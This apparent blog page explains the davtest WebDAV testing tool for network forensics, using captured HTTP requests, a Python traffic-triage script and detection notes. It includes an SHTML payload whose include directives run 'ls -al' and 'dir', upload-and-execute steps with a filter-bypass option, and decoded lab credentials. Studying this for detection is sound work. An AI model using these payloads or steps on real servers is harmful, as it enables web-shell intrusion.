Tools | February 9, 2026 | 2 min read | by 0xt0pus

DAVTest

WebDAV exploitation testing tool for checking upload capabilities and file execution


davtest

Description

davtest is a WebDAV exploitation testing tool: a Perl script built on the HTTP::DAV module, which is why every request it sends carries that module's default User-Agent, DAV.pm/v0.49. Against a WebDAV-enabled server it creates a test directory, uploads small test files of various types into it and then requests each file back, to determine which file extensions the server accepts for upload and which of those it actually executes. The two are different findings: a PUT answered with 201 Created shows only that the extension is writable, and a GET answered with 200 OK shows only that the file is served. Execution is confirmed only when the response body contains the output the test script should produce rather than the script's own source echoed back.

Usage 1: Test WebDAV File Upload Capabilities

davtest automatically creates a test directory on the WebDAV server with an MKCOL request. The directory name is DavTestDir_ followed by a random string (DavTestDir_GRgDKIdLKVtIGeL in the capture below), and the test files uploaded into it are named davtest_ plus the same random string and the extension under test. A 201 Created reply to the MKCOL is the first confirmation that the authenticated account has write access to the share.

Observed HTTP Request (MKCOL - Create Directory):

MKCOL /webdav/DavTestDir_GRgDKIdLKVtIGeL/ HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Authorization: Basic QWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=
Host: www.mindtech.net:80
User-Agent: DAV.pm/v0.49
Content-Length: 0

Usage 2: Upload and Test ASPX Execution

davtest uploads the test files (here .aspx) with PUT and then requests each one with GET to check whether the server executes it. Note that the GET still carries the Basic Authorization header: HTTP::DAV resends the credentials on every request, so they appear throughout the stream. A 200 OK with the ASP.NET headers shown below and a body consisting of the script's output means IIS ran the file; a 200 OK whose body is the uploaded source returned verbatim means the extension is uploadable but served as static content. Arbitrary .aspx execution by a WebDAV user is the real finding, since it is equivalent to a web shell.

Observed HTTP Request (GET - Verify Execution):

GET /webdav/DavTestDir_GRgDKIdLKVtIGeL/davtest_GRgDKIdLKVtIGeL.aspx HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Authorization: Basic QWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=
Host: www.mindtech.net:80
User-Agent: DAV.pm/v0.49
Content-Length: 0

Successful Execution Response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET

Usage 3: Upload and Test SHTML Server-Side Includes

davtest also uploads an .shtml file containing Server-Side Include (SSI) directives to check for command execution via SSI. The first line of the payload tests whether SSI is processed at all (a four-digit year should appear between the YEAR: markers); the next two lines attempt to run ls -al (Unix) and dir (Windows), so command output between the EXEC markers confirms command execution. If the directives come back unprocessed, SSI is not enabled for that extension. The different random suffix (JdeStExYFBGs) and the PUT straight into /webdav/ rather than a DavTestDir_ directory indicate that this request came from a separate davtest invocation from the one in Usages 1 and 2.

Observed HTTP Request (PUT - Upload SHTML):

PUT /webdav/davtest_JdeStExYFBGs.shtml HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Authorization: Basic QWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=
Host: www.mindtech.net:80
User-Agent: DAV.pm/v0.49
Content-Length: 181

SHTML Payload Content:

<!--#config timefmt="%Y" -->YEAR:<!--#flastmod file="davtest_JdeStExYFBGs.shtml"-->:YEAR
EXEC ls:<!--#exec cmd="ls -al"-->:EXEC ls
EXEC dir:<!--#exec cmd="dir"-->:EXEC dir
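To turn the three usages above into a forensic triage, the added example below (written for this page, not part of davtest or the original post) walks raw request/response pairs such as those obtained with Wireshark's Follow TCP Stream, keeps only davtest traffic (identified by the DAV.pm/ User-Agent or the DavTestDir_/davtest_ naming scheme), decodes the Basic credentials, records which extensions were created with 201 and, for each file fetched back with 200, applies the executed-versus-echoed distinction. The sample exchanges and all response bodies are constructed for the example; the ASP.NET test body and the rule that a body free of source markers counts as executed are assumptions, since the real capture and davtest's own marker strings are not on this page.

```python
"""Triage davtest activity in HTTP request/response pairs pulled from a capture."""
import base64
import re

DAVTEST_UA = "DAV.pm/"                                            # HTTP::DAV default User-Agent prefix
DAVTEST_NAME = re.compile(r"(?:DavTestDir_|davtest_)[A-Za-z]+")   # davtest's random naming scheme


def parse_message(raw: str):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_basic(auth_header: str):
    """'Basic <base64>' -> (user, password); None for any other scheme."""
    scheme, _, token = auth_header.partition(" ")
    if scheme.lower() != "basic":
        return None
    user, _, password = base64.b64decode(token).decode("utf-8", "replace").partition(":")
    return user, password


def execution_verdict(ext: str, body: str) -> str:
    """Verdict for a 200 OK on an uploaded test file.

    Surviving source markers (ASP <% %>, PHP <?php, SSI <!--# ) mean the file was
    served, not executed. For .shtml, davtest brackets each probe with YEAR:..:YEAR
    and EXEC ls:..:EXEC ls, so executed output lands between the markers. A body
    with no source markers is assumed executed (assumption made for this example).
    """
    if ext in ("txt", "html"):
        return "static"
    if re.search(r"<%|<\?php|<!--#", body):
        return "source_echoed"
    if ext == "shtml":
        if re.search(r"EXEC (ls|dir):.+:EXEC \1", body, re.S):
            return "ssi_exec"
        if re.search(r"YEAR:\d{4}:YEAR", body):
            return "ssi_processed_no_exec"
        return "unknown"
    return "executed"


def triage(exchanges):
    """Summarise davtest's results from (request, response) raw message pairs."""
    report = {"credentials": None, "hosts": set(), "dirs": {}, "uploads": {}, "fetches": {}}
    for req_raw, resp_raw in exchanges:
        start, h, _ = parse_message(req_raw)
        method, path, _ = start.split(" ", 2)
        if not (h.get("user-agent", "").startswith(DAVTEST_UA) or DAVTEST_NAME.search(path)):
            continue                                   # some other client; out of scope here
        status_line, _, body = parse_message(resp_raw)
        status = int(status_line.split(" ")[1])
        if report["credentials"] is None and "authorization" in h:
            report["credentials"] = decode_basic(h["authorization"])
        report["hosts"].add(h.get("host", "?"))
        leaf = path.rsplit("/", 1)[-1]
        ext = leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""
        if method == "MKCOL":
            report["dirs"][path] = status
        elif method == "PUT":
            report["uploads"][ext] = status
        elif method == "GET" and ext:
            verdict = execution_verdict(ext, body) if status == 200 else "not_served"
            report["fetches"][ext] = (status, verdict)
    return report


# Constructed sample modelled on the requests above; bodies are hypothetical.
_AUTH = "Authorization: Basic QWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=\r\n"
_DIR = "/webdav/DavTestDir_GRgDKIdLKVtIGeL/"
SHTML_PAYLOAD = ('<!--#config timefmt="%Y" -->YEAR:<!--#flastmod file="davtest_JdeStExYFBGs.shtml"-->:YEAR\n'
                 'EXEC ls:<!--#exec cmd="ls -al"-->:EXEC ls\nEXEC dir:<!--#exec cmd="dir"-->:EXEC dir\n')


def _req(method, path, body=""):
    return (f"{method} {path} HTTP/1.1\r\n{_AUTH}Host: www.mindtech.net:80\r\n"
            f"User-Agent: DAV.pm/v0.49\r\nContent-Length: {len(body)}\r\n\r\n{body}")


def _resp(status, body="", ctype="text/html; charset=utf-8"):
    return f"HTTP/1.1 {status}\r\nServer: Microsoft-IIS/10.0\r\nContent-Type: {ctype}\r\n\r\n{body}"


SAMPLE = [
    (_req("MKCOL", _DIR), _resp("201 Created")),
    (_req("PUT", _DIR + "davtest_GRgDKIdLKVtIGeL.txt", "davtest"), _resp("201 Created")),
    (_req("GET", _DIR + "davtest_GRgDKIdLKVtIGeL.txt"), _resp("200 OK", "davtest", "text/plain")),
    (_req("PUT", _DIR + "davtest_GRgDKIdLKVtIGeL.aspx", '<% Response.Write("davtest"); %>'), _resp("201 Created")),
    (_req("GET", _DIR + "davtest_GRgDKIdLKVtIGeL.aspx"), _resp("200 OK", "davtest")),    # executed
    (_req("PUT", _DIR + "davtest_GRgDKIdLKVtIGeL.php", "<?php echo 'davtest'; ?>"), _resp("403 Forbidden")),
    (_req("PUT", "/webdav/davtest_JdeStExYFBGs.shtml", SHTML_PAYLOAD), _resp("201 Created")),
    (_req("GET", "/webdav/davtest_JdeStExYFBGs.shtml"), _resp("200 OK", SHTML_PAYLOAD)),   # served raw
    ("GET /index.html HTTP/1.1\r\nHost: www.mindtech.net\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
     _resp("200 OK", "<html>unrelated browsing</html>")),                                 # not davtest
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

On the constructed sample the report shows the credentials Administrator:P@ssw0rd!, the directory created with 201, .txt/.aspx/.shtml accepted and .php refused with 403, the .aspx verdict "executed" and the .shtml verdict "source_echoed". When the SSI file does come back processed, the shtml branch distinguishes a year-only result (SSI on, exec disabled) from directory listings between the EXEC markers (command execution).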

Basic Command Usage

davtest -url http://target/webdav -auth user:password

Two options change what shows up on the wire: -cleanup deletes the test files and directory afterwards (the capture above shows no cleanup), and -move uploads each test file as .txt and then renames it with a MOVE request to the extension under test, which bypasses filters that block an extension on PUT but not on rename and leaves MOVE requests in the traffic.

Notes

  • davtest identifies itself with User-Agent: DAV.pm/v0.49 (the HTTP::DAV module's default) on every request, including the GETs that fetch the test files back
  • Uses HTTP Basic authentication; the Authorization header is only Base64-encoded, not encrypted, so over plain HTTP (port 80, as here) the username and password are recoverable from the capture (the header above decodes to Administrator:P@ssw0rd!)
  • Automatically generates random directory and file names (DavTestDir_<random>, davtest_<random>.<ext>); the fixed prefixes, together with the User-Agent and the MKCOL, PUT, GET sequence, make a reliable detection signature
  • Tests multiple file types: aspx, shtml, php, jsp, txt, html, etc.
  • HTTP 201 Created in response to MKCOL or PUT indicates a successful directory creation or file upload; 200 OK on the following GET shows only that the file is served, and execution is confirmed only by executed output (not the uploaded source) in the response body
  • In this capture the target was Microsoft-IIS/10.0 with WebDAV enabled; davtest is not IIS-specific and works against any WebDAV server that grants the account write access
  • In the CCD Network Forensics exam, davtest traffic was analyzed to identify attacker activity against a WebDAV server (www.mindtech.net)